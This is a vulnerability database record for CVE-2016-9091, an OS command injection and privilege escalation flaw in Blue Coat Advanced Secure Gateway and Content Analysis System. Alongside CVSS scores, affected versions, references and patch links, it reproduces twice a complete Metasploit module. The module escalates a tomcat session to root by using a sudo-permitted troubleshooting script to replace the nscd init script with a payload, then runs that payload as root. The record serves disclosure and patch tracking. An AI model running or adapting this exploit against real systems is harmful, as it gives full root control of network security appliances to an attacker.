var-201704-0485
Vulnerability from variot
Blue Coat Advanced Secure Gateway (ASG) 6.6 before 6.6.5.4 and Content Analysis System (CAS) 1.3 before 1.3.7.4 are susceptible to an OS command injection vulnerability. An authenticated malicious administrator can execute arbitrary OS commands with elevated system privileges. BlueCoatAdvancedSecureGateway (ASG) and ContentAnalysisSystem (CAS) are products of BlueCoatSystems, USA. ASG is a secure Web gateway device; CAS is a malware analysis system that integrates an application whitelist and a dual anti-malware signature database. Multiple Bluecoat Products are prone to command-injection vulnerability because it fails to properly sanitize user-supplied input. This may aid in further attacks. The following products are affected: Advanced Secure Gateway 6.6 prior to 6.6.5.4 is vulnerable. Content Analysis System 1.3 prior to 1.3.7.4 is vulnerable. # Exploit Title: OS Command Injection Vulnerability in BlueCoat ASG and CAS
Date: April 3, 2017
Exploit Authors: Chris Hebert, Peter Paccione and Corey Boyd
Contact: chrisdhebert[at]gmail.com
Vendor Security Advisory: https://bto.bluecoat.com/security-advisory/sa138
Version: CAS 1.3 prior to 1.3.7.4 & ASG 6.6 prior to 6.6.5.4 are vulnerable
Tested on: BlueCoat CAS 1.3.7.1
CVE : cve-2016-9091
Timeline:
08/31/2016 (Vulnerablities Discovered) 03/31/2017 (Final Vendor Patch Confirmed) 04/03/2017 (Public Release)
Description: The BlueCoat ASG and CAS management consoles are susceptible to a privilege escalation vulnerablity. A malicious user with tomcat privileges can escalate to root via the vulnerable mvtroubleshooting.sh script.
Proof of Concept:
Metasploit Module - root priv escalation (via mvtroubleshooting.sh)
This module requires Metasploit: http://metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework
require 'msf/core' require 'rex' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/exe'
class Metasploit4 < Msf::Exploit::Local Rank = AverageRanking
include Msf::Exploit::EXE include Msf::Post::File include Msf::Exploit::Local::Linux
def initialize(info={})
super( update_info( info, {
'Name' => 'BlueCoat CAS 1.3.7.1 tomcat->root privilege escalation (via mvtroubleshooting.sh)',
'Description' => %q{
This module abuses the sudo access granted to tomcat and the mvtroubleshooting.sh script to escalate
privileges. In order to work, a tomcat session with access to sudo on the sudoers
is needed. This module is useful for post exploitation of BlueCoat
vulnerabilities, where typically web server privileges are acquired, and this
user is allowed to execute sudo on the sudoers file.
},
'License' => MSF_LICENSE,
'Author' => [
'Chris Hebert
def check id=cmd_exec("id -un") if id!="tomcat" print_status("#{peer} - ERROR - Session running as id= #{id}, but must be tomcat") fail_with(Failure::NoAccess, "Session running as id= #{id}, but must be tomcat") end
clprelease=cmd_exec("cat /etc/clp-release | cut -d \" \" -f 3")
if clprelease!="1.3.7.1"
print_status("#{peer} - ERROR - BlueCoat version #{clprelease}, but must be 1.3.7.1")
fail_with(Failure::NotVulnerable, "BlueCoat version #{clprelease}, but must be 1.3.7.1")
end
return Exploit::CheckCode::Vulnerable
end def exploit print_status("#{peer} - Checking for vulnerable BlueCoat session...") if check != CheckCode::Vulnerable fail_with(Failure::NotVulnerable, "FAILED Exploit - BlueCoat not running as tomcat or not version 1.3.7.1") end
print_status("#{peer} - Running Exploit...")
exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.elf"
write_file(exe_file, generate_payload_exe)
cmd_exec "chmod +x #{exe_file}"
begin
#Backup original nscd init script
cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /etc/init.d/nscd /data/bluecoat/avenger/ui/logs/tro$
#Replaces /etc/init.d/nscd script with meterpreter payload
cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh #{exe_file} /data/bluecoat/avenger/ui/logs/troubles$
#Executes meterpreter payload as root
cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/flush_dns.sh"
#note, flush_dns.sh waits for payload to exit. (killing it falls over to init pid=1)
ensure
#Restores original nscd init script
cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /var/log/nscd.backup /data/bluecoat/avenger/ui/logs$
#Remove meterpreter payload (precautionary as most recent mv_troubleshooting.sh should also remove it)
cmd_exec "/bin/rm -f #{exe_file}"
end
print_status("#{peer} - The exploit module has finished")
#Maybe something here to deal with timeouts?? noticied inconsistant.. Exploit failed: Rex::TimeoutError Operation timed out.
end end
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201704-0485",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "advanced secure gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "bluecoat",
"version": "6.6.5.2"
},
{
"model": "content analysis system software",
"scope": "lte",
"trust": 1.0,
"vendor": "bluecoat",
"version": "1.3.7.3"
},
{
"model": "content analysis system software",
"scope": "eq",
"trust": 0.8,
"vendor": "blue coat",
"version": "1.3.7.4"
},
{
"model": "advanced secure gateway",
"scope": "eq",
"trust": 0.8,
"vendor": "blue coat",
"version": "software 6.6.5.4"
},
{
"model": "advanced secure gateway",
"scope": "lt",
"trust": 0.8,
"vendor": "blue coat",
"version": "6.6"
},
{
"model": "content analysis system software",
"scope": "lt",
"trust": 0.8,
"vendor": "blue coat",
"version": "1.3"
},
{
"model": "coat advanced secure gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "blue",
"version": "6.6\u003c6.6.5.4"
},
{
"model": "coat content analysis system",
"scope": "eq",
"trust": 0.6,
"vendor": "blue",
"version": "1.3\u003c1.3.7.4"
},
{
"model": "advanced secure gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "bluecoat",
"version": "6.6.5.2"
},
{
"model": "content analysis system software",
"scope": "eq",
"trust": 0.6,
"vendor": "bluecoat",
"version": "1.3.7.3"
},
{
"model": "content analysis system",
"scope": "eq",
"trust": 0.3,
"vendor": "bluecoat",
"version": "1.3"
},
{
"model": "advanced secure gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "bluecoat",
"version": "6.6"
},
{
"model": "content analysis system",
"scope": "ne",
"trust": 0.3,
"vendor": "bluecoat",
"version": "1.3.7.4"
},
{
"model": "advanced secure gateway",
"scope": "ne",
"trust": 0.3,
"vendor": "bluecoat",
"version": "6.6.5.4"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-05236"
},
{
"db": "BID",
"id": "97372"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-008286"
},
{
"db": "NVD",
"id": "CVE-2016-9091"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-236"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:bluecoat:advanced_secure_gateway:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "6.6.5.2",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:bluecoat:content_analysis_system_software:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.3.7.3",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-9091"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Peter Paccione, Chris Hebert, and Corey Boyd.",
"sources": [
{
"db": "BID",
"id": "97372"
}
],
"trust": 0.3
},
"cve": "CVE-2016-9091",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2016-9091",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2017-05236",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "VHN-97911",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.2,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2016-9091",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-9091",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2017-05236",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201704-236",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-97911",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-05236"
},
{
"db": "VULHUB",
"id": "VHN-97911"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-008286"
},
{
"db": "NVD",
"id": "CVE-2016-9091"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-236"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Blue Coat Advanced Secure Gateway (ASG) 6.6 before 6.6.5.4 and Content Analysis System (CAS) 1.3 before 1.3.7.4 are susceptible to an OS command injection vulnerability. An authenticated malicious administrator can execute arbitrary OS commands with elevated system privileges. BlueCoatAdvancedSecureGateway (ASG) and ContentAnalysisSystem (CAS) are products of BlueCoatSystems, USA. ASG is a secure Web gateway device; CAS is a malware analysis system that integrates an application whitelist and a dual anti-malware signature database. Multiple Bluecoat Products are prone to command-injection vulnerability because it fails to properly sanitize user-supplied input. This may aid in further attacks. \nThe following products are affected:\nAdvanced Secure Gateway 6.6 prior to 6.6.5.4 is vulnerable. \nContent Analysis System 1.3 prior to 1.3.7.4 is vulnerable. # Exploit Title: OS Command Injection Vulnerability in BlueCoat ASG and CAS\n# Date: April 3, 2017\n# Exploit Authors: Chris Hebert, Peter Paccione and Corey Boyd\n# Contact: chrisdhebert[at]gmail.com\n# Vendor Security Advisory: https://bto.bluecoat.com/security-advisory/sa138\n# Version: CAS 1.3 prior to 1.3.7.4 \u0026 ASG 6.6 prior to 6.6.5.4 are vulnerable\n# Tested on: BlueCoat CAS 1.3.7.1\n# CVE : cve-2016-9091\n \nTimeline:\n--------\n08/31/2016 (Vulnerablities Discovered)\n03/31/2017 (Final Vendor Patch Confirmed)\n04/03/2017 (Public Release)\n \nDescription:\nThe BlueCoat ASG and CAS management consoles are susceptible to a privilege escalation vulnerablity. \nA malicious user with tomcat privileges can escalate to root via the vulnerable mvtroubleshooting.sh script. \n \nProof of Concept:\n \nMetasploit Module - root priv escalation (via mvtroubleshooting.sh)\n-----------------\n##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n \nrequire \u0027msf/core\u0027\nrequire \u0027rex\u0027\nrequire \u0027msf/core/exploit/local/linux\u0027\nrequire \u0027msf/core/exploit/exe\u0027\n \n \nclass Metasploit4 \u003c Msf::Exploit::Local\n Rank = AverageRanking\n \n include Msf::Exploit::EXE\n include Msf::Post::File\n include Msf::Exploit::Local::Linux\n \n def initialize(info={})\n super( update_info( info, {\n \u0027Name\u0027 =\u003e \u0027BlueCoat CAS 1.3.7.1 tomcat-\u003eroot privilege escalation (via mvtroubleshooting.sh)\u0027,\n \u0027Description\u0027 =\u003e %q{\n This module abuses the sudo access granted to tomcat and the mvtroubleshooting.sh script to escalate\n privileges. In order to work, a tomcat session with access to sudo on the sudoers\n is needed. This module is useful for post exploitation of BlueCoat\n vulnerabilities, where typically web server privileges are acquired, and this\n user is allowed to execute sudo on the sudoers file. \n },\n \u0027License\u0027 =\u003e MSF_LICENSE,\n \u0027Author\u0027 =\u003e [\n \u0027Chris Hebert \u003cchrisdhebert[at]gmail.com\u003e\u0027,\n \u0027Pete Paccione \u003cpetepaccione[at]gmail.com\u003e\u0027,\n \u0027Corey Boyd \u003ccorey.k.boyd[at]gmail.com\u003e\u0027\n ],\n \u0027DisclosureDate\u0027 =\u003e \u0027Vendor Contacted 8-31-2016\u0027,\n \u0027References\u0027 =\u003e\n [\n [\u0027EDB\u0027, \u0027##TBD##\u0027],\n [\u0027CVE\u0027, \u00272016-9091\u0027 ],\n [\u0027URL\u0027, \u0027http://https://bto.bluecoat.com/security-advisory/sa138\u0027]\n ],\n \u0027Platform\u0027 =\u003e %w{ linux unix },\n \u0027Arch\u0027 =\u003e [ ARCH_X86 ],\n \u0027SessionTypes\u0027 =\u003e [ \u0027shell\u0027, \u0027meterpreter\u0027 ],\n \u0027Targets\u0027 =\u003e\n [\n [ \u0027Linux x86\u0027, { \u0027Arch\u0027 =\u003e ARCH_X86 } ]\n ],\n \u0027DefaultOptions\u0027 =\u003e { \"PrependSetresuid\" =\u003e true, \"WfsDelay\" =\u003e 2 },\n \u0027DefaultTarget\u0027 =\u003e 0,\n }\n ))\n register_options([\n OptString.new(\"WritableDir\", [ false, \"A directory where we can write files\", \"/var/log\" ]),\n ], self.class)\n end\n \n def check\n id=cmd_exec(\"id -un\")\n if id!=\"tomcat\"\n print_status(\"#{peer} - ERROR - Session running as id= #{id}, but must be tomcat\")\n fail_with(Failure::NoAccess, \"Session running as id= #{id}, but must be tomcat\")\n end\n \n clprelease=cmd_exec(\"cat /etc/clp-release | cut -d \\\" \\\" -f 3\")\n if clprelease!=\"1.3.7.1\"\n print_status(\"#{peer} - ERROR - BlueCoat version #{clprelease}, but must be 1.3.7.1\")\n fail_with(Failure::NotVulnerable, \"BlueCoat version #{clprelease}, but must be 1.3.7.1\")\n end\n \n return Exploit::CheckCode::Vulnerable\n end\n def exploit\n print_status(\"#{peer} - Checking for vulnerable BlueCoat session...\")\n if check != CheckCode::Vulnerable\n fail_with(Failure::NotVulnerable, \"FAILED Exploit - BlueCoat not running as tomcat or not version 1.3.7.1\")\n end\n \n print_status(\"#{peer} - Running Exploit...\")\n exe_file = \"#{datastore[\"WritableDir\"]}/#{rand_text_alpha(3 + rand(5))}.elf\"\n write_file(exe_file, generate_payload_exe)\n cmd_exec \"chmod +x #{exe_file}\"\n \n begin\n #Backup original nscd init script\n cmd_exec \"/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /etc/init.d/nscd /data/bluecoat/avenger/ui/logs/tro$\n #Replaces /etc/init.d/nscd script with meterpreter payload\n cmd_exec \"/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh #{exe_file} /data/bluecoat/avenger/ui/logs/troubles$\n #Executes meterpreter payload as root\n cmd_exec \"/usr/bin/sudo /opt/bluecoat/avenger/scripts/flush_dns.sh\"\n #note, flush_dns.sh waits for payload to exit. (killing it falls over to init pid=1)\n ensure\n #Restores original nscd init script\n cmd_exec \"/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /var/log/nscd.backup /data/bluecoat/avenger/ui/logs$\n #Remove meterpreter payload (precautionary as most recent mv_troubleshooting.sh should also remove it)\n cmd_exec \"/bin/rm -f #{exe_file}\"\n end\n print_status(\"#{peer} - The exploit module has finished\")\n #Maybe something here to deal with timeouts?? noticied inconsistant.. Exploit failed: Rex::TimeoutError Operation timed out. \n \n end\nend\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-9091"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-008286"
},
{
"db": "CNVD",
"id": "CNVD-2017-05236"
},
{
"db": "BID",
"id": "97372"
},
{
"db": "VULHUB",
"id": "VHN-97911"
},
{
"db": "PACKETSTORM",
"id": "141909"
}
],
"trust": 2.61
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-97911",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-97911"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-9091",
"trust": 3.5
},
{
"db": "BID",
"id": "97372",
"trust": 2.0
},
{
"db": "EXPLOIT-DB",
"id": "41785",
"trust": 1.7
},
{
"db": "EXPLOIT-DB",
"id": "41786",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2016-008286",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201704-236",
"trust": 0.7
},
{
"db": "BID",
"id": "41785",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2017-05236",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "141909",
"trust": 0.2
},
{
"db": "SEEBUG",
"id": "SSVID-92941",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-97911",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-05236"
},
{
"db": "VULHUB",
"id": "VHN-97911"
},
{
"db": "BID",
"id": "97372"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-008286"
},
{
"db": "PACKETSTORM",
"id": "141909"
},
{
"db": "NVD",
"id": "CVE-2016-9091"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-236"
}
]
},
"id": "VAR-201704-0485",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-05236"
},
{
"db": "VULHUB",
"id": "VHN-97911"
}
],
"trust": 0.87514534
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-05236"
}
]
},
"last_update_date": "2023-12-18T12:22:44.941000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SA138",
"trust": 0.8,
"url": "https://bto.bluecoat.com/security-advisory/sa138"
},
{
"title": "BluecoatASG6.6/CASOS Command Injection Vulnerability Vulnerability Patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/92633"
},
{
"title": "Blue Coat Advanced Secure Gateway and Content Analysis System Fixes for operating system command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=69073"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-05236"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-008286"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-236"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-97911"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-008286"
},
{
"db": "NVD",
"id": "CVE-2016-9091"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.1,
"url": "https://bto.bluecoat.com/security-advisory/sa138"
},
{
"trust": 1.7,
"url": "https://www.exploit-db.com/exploits/41785/"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/97372"
},
{
"trust": 1.1,
"url": "https://www.exploit-db.com/exploits/41786/"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-9091"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-9091"
},
{
"trust": 0.3,
"url": "https://www.bluecoat.com/"
},
{
"trust": 0.1,
"url": "https://github.com/rapid7/metasploit-framework"
},
{
"trust": 0.1,
"url": "http://https://bto.bluecoat.com/security-advisory/sa138\u0027]"
},
{
"trust": 0.1,
"url": "http://metasploit.com/download"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-05236"
},
{
"db": "VULHUB",
"id": "VHN-97911"
},
{
"db": "BID",
"id": "97372"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-008286"
},
{
"db": "PACKETSTORM",
"id": "141909"
},
{
"db": "NVD",
"id": "CVE-2016-9091"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-236"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-05236"
},
{
"db": "VULHUB",
"id": "VHN-97911"
},
{
"db": "BID",
"id": "97372"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-008286"
},
{
"db": "PACKETSTORM",
"id": "141909"
},
{
"db": "NVD",
"id": "CVE-2016-9091"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-236"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-04-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-05236"
},
{
"date": "2017-04-05T00:00:00",
"db": "VULHUB",
"id": "VHN-97911"
},
{
"date": "2017-04-03T00:00:00",
"db": "BID",
"id": "97372"
},
{
"date": "2017-05-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-008286"
},
{
"date": "2017-04-03T03:33:00",
"db": "PACKETSTORM",
"id": "141909"
},
{
"date": "2017-04-05T15:59:00.170000",
"db": "NVD",
"id": "CVE-2016-9091"
},
{
"date": "2017-04-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201704-236"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-04-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-05236"
},
{
"date": "2017-08-16T00:00:00",
"db": "VULHUB",
"id": "VHN-97911"
},
{
"date": "2017-04-11T00:02:00",
"db": "BID",
"id": "97372"
},
{
"date": "2017-05-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-008286"
},
{
"date": "2017-08-16T01:29:11.507000",
"db": "NVD",
"id": "CVE-2016-9091"
},
{
"date": "2017-04-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201704-236"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201704-236"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Blue Coat Advanced Secure Gateway and Content Analysis System In OS Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-008286"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201704-236"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.